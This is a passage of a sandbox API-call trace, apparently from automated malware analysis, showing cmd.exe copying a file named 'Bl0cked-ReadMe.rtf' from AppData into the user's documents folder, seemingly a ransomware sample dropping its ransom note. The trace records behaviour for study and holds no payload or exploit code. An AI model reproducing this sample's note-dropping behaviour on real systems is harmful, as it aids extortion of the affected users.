returned 0x740 [0234.484] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x740) returned 0x38 [0234.484] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.484] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.484] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.484] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.485] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f804 | out: phkResult=0x14f804*=0x0) returned 0x2 [0234.485] VirtualQuery (in: lpAddress=0x14f83b, lpBuffer=0x14f7d4, dwLength=0x1c | out: lpBuffer=0x14f7d4*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.485] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f7d4, dwLength=0x1c | out: lpBuffer=0x14f7d4*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.485] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f7d4, dwLength=0x1c | out: lpBuffer=0x14f7d4*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.485] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f7d4, dwLength=0x1c | out: lpBuffer=0x14f7d4*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.485] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f7d4, dwLength=0x1c | out: lpBuffer=0x14f7d4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.485] GetConsoleOutputCP () returned 0x1b5 
[0234.485] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.485] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.485] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.485] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.485] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.485] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.485] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.485] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.485] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.485] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.486] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.486] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.486] GetEnvironmentStringsW () returned 0x1b0188* [0234.486] FreeEnvironmentStringsW (penv=0x1b0188) returned 1 [0234.486] GetEnvironmentStringsW () returned 0x1b0188* [0234.486] FreeEnvironmentStringsW (penv=0x1b0188) returned 1 [0234.486] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e774 | out: phkResult=0x14e774*=0x40) returned 0x0 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x0, lpData=0x14e780*=0xb0, lpcbData=0x14e778*=0x1000) returned 0x2 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x1, lpcbData=0x14e778*=0x4) returned 0x0 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x0, 
lpData=0x14e780*=0x1, lpcbData=0x14e778*=0x1000) returned 0x2 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x0, lpcbData=0x14e778*=0x4) returned 0x0 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x40, lpcbData=0x14e778*=0x4) returned 0x0 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x40, lpcbData=0x14e778*=0x4) returned 0x0 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x0, lpData=0x14e780*=0x40, lpcbData=0x14e778*=0x1000) returned 0x2 [0234.486] RegCloseKey (hKey=0x40) returned 0x0 [0234.486] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e774 | out: phkResult=0x14e774*=0x40) returned 0x0 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x0, lpData=0x14e780*=0x40, lpcbData=0x14e778*=0x1000) returned 0x2 [0234.486] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x1, lpcbData=0x14e778*=0x4) returned 0x0 [0234.487] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x0, lpData=0x14e780*=0x1, lpcbData=0x14e778*=0x1000) returned 0x2 [0234.487] 
RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x0, lpcbData=0x14e778*=0x4) returned 0x0 [0234.487] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x9, lpcbData=0x14e778*=0x4) returned 0x0 [0234.487] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x4, lpData=0x14e780*=0x9, lpcbData=0x14e778*=0x4) returned 0x0 [0234.487] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e77c, lpData=0x14e780, lpcbData=0x14e778*=0x1000 | out: lpType=0x14e77c*=0x0, lpData=0x14e780*=0x9, lpcbData=0x14e778*=0x1000) returned 0x2 [0234.487] RegCloseKey (hKey=0x40) returned 0x0 [0234.487] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.487] srand (_Seed=0x5b8863c2) [0234.487] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0234.487] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0234.487] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.487] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b18e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.487] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.487] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.488] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.488] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.488] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.488] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.488] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.488] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.488] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.488] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.488] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.488] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.488] GetEnvironmentStringsW () returned 0x1b22d8* [0234.488] FreeEnvironmentStringsW (penv=0x1b22d8) returned 1 [0234.488] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.488] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.488] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.488] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.488] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.488] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.488] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.488] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.488] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0234.488] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.488] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f540 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.488] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f540, lpFilePart=0x14f53c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f53c*="Desktop") returned 0x18 [0234.488] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.488] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f2bc | out: lpFindFileData=0x14f2bc) returned 0x1b0018 [0234.489] FindClose (in: hFindFile=0x1b0018 | out: hFindFile=0x1b0018) returned 1 [0234.489] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f2bc | out: lpFindFileData=0x14f2bc) returned 0x1b0018 [0234.489] FindClose (in: hFindFile=0x1b0018 | out: hFindFile=0x1b0018) returned 1 [0234.489] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f2bc | out: lpFindFileData=0x14f2bc) returned 0x1b0018 [0234.489] FindClose (in: hFindFile=0x1b0018 | out: hFindFile=0x1b0018) returned 1 [0234.489] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.489] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.489] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.489] GetEnvironmentStringsW () returned 0x1b2af8* [0234.489] FreeEnvironmentStringsW (penv=0x1b2af8) returned 1 [0234.489] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.490] GetConsoleOutputCP () returned 0x1b5 [0234.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) 
returned 1 [0234.490] GetUserDefaultLCID () returned 0x409 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f680, cchData=128 | out: lpLCData="0") returned 2 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f680, cchData=128 | out: lpLCData="0") returned 2 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f680, cchData=128 | out: lpLCData="1") returned 2 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.491] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.491] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.491] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.491] GetConsoleTitleW (in: lpConsoleTitle=0x1a08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0234.491] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.491] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.492] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.492] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.492] _wcsicmp (_String1="type", _String2=")") returned 75 [0234.492] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0234.492] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0234.492] _wcsicmp (_String1="IF", _String2="type") returned -11 [0234.492] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0234.492] _wcsicmp (_String1="REM", _String2="type") returned -2 [0234.492] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0234.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.496] GetFileType (hFile=0x7) returned 0x2 [0234.496] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.496] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f578 | out: lpMode=0x14f578) returned 1 [0234.496] _dup (_FileHandle=1) returned 3 [0234.496] _close (_FileHandle=1) returned 0 [0234.496] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0234.497] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x14f548, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0234.497] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0234.497] GetConsoleTitleW (in: lpConsoleTitle=0x14f378, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.497] _wcsicmp 
(_String1="type", _String2="DIR") returned 16 [0234.497] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0234.497] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0234.497] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0234.498] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.498] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x14eedc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eedc) returned 0x1a0e78 [0234.498] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0234.498] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0234.498] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0234.498] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14dde8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0234.498] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0234.498] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.498] GetFileType (hFile=0x54) returned 0x1 [0234.498] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.498] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x14de40 | out: lpFileSizeHigh=0x14de40*=0x0) returned 0x1632 [0234.499] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.499] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.499] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.499] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.499] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.499] GetFileType (hFile=0x4c) returned 0x1 [0234.499] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.499] GetFileType (hFile=0x4c) returned 0x1 [0234.499] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.499] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] GetFileType (hFile=0x4c) returned 0x1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] GetFileType (hFile=0x4c) returned 0x1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] GetFileType (hFile=0x4c) returned 0x1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] GetFileType (hFile=0x4c) returned 0x1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] WriteFile (in: 
hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] GetFileType (hFile=0x4c) returned 0x1 [0234.500] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.500] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] GetFileType (hFile=0x4c) returned 0x1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.501] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.501] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.501] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.501] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] GetFileType (hFile=0x4c) returned 0x1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] GetFileType (hFile=0x4c) returned 0x1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.501] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0234.501] GetFileType (hFile=0x4c) returned 0x1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] GetFileType (hFile=0x4c) returned 0x1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] GetFileType (hFile=0x4c) returned 0x1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] GetFileType (hFile=0x4c) returned 0x1 [0234.501] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.501] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] GetFileType (hFile=0x4c) returned 0x1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0234.502] GetFileType (hFile=0x4c) returned 0x1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.502] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.502] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] GetFileType (hFile=0x4c) returned 0x1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] GetFileType (hFile=0x4c) returned 0x1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: 